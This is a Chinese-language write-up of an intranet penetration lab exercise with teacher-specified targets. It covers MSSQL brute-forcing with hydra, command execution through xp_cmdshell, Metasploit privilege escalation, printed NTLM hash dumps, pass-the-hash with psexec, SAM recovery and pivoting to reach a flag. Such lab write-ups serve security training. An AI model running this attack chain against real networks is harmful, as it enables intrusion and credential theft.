内网渗透复盘

前提，已经确定目标机器，若不确定目标机器，应先试用nmap扫描存活的机器。

0x00 查询开放的端口

python F-NAScan.py -h 169.254.126.84

扫描结果：
[15:23:57] 169.254.126.84:139 is NetBIOS(default)
[15:23:57] 169.254.126.84:1433 is mssql(default)
[15:23:57] 169.254.126.84:445 is smb(default)

0x01 对mssql进行爆破

hydra -l sa -P rockyou71000.txt 169.254.126.84 mssql

0x02 登录mssql并上传木马控制机器A

使用msf的模块auxiliary/admin/mssql/mssql_exec或者navicat登录数据库写入木马
获取该机器A的session
mssql语句示例：

exec sys.xp_cmdshell "ipconfig"

0x03 针对机器A进行提权

通过geuid查看当前的用户权限，获取到的是service权限，无法执行hashdump

run post/multi/recon/local_exploit_suggester

发现有多个exploit可以利用，多试几个，说不定哪个就成功了

exploit/windows/local/ms16_075_reflection

最终，提权成功，得到hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:40ffcc46d649efefcc56535512d24827:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

0x04 扫描别的机器

在msf的相应session中，执行扫描(理论上应该扫描全网段，此处老师指定了机器)

run arp_scanner -r 169.254.126.83-85

0x05 获取B机器的session

exploit/windows/smb/psexec

注：其中的smbpass直接传递0x03中的hash即可登录
hashdump第二台机器的密码

0x06 在B机器上查找

找到sam的备份文件，下载系列文件

c:\share\backup\
download sam

使用secretsdump.py（python自带）恢复dump

find / -name secretsdump
/usr/share/doc/python-impacket/examples/secretsdump.py

找到备份存储的密码

0x07 获取C机器的session

因为C机器直接不可达，需要设置路由，在B机器上设置路由
run autoroute 169.254.126.85
利用模块exploit/windows/smb/psexec
依然，smbpass传递hash，需注意C机器不直接可达，因此，payload的侦听机器需要设置为B
查找C机器上的flag,并读取flag文件

search -f flag*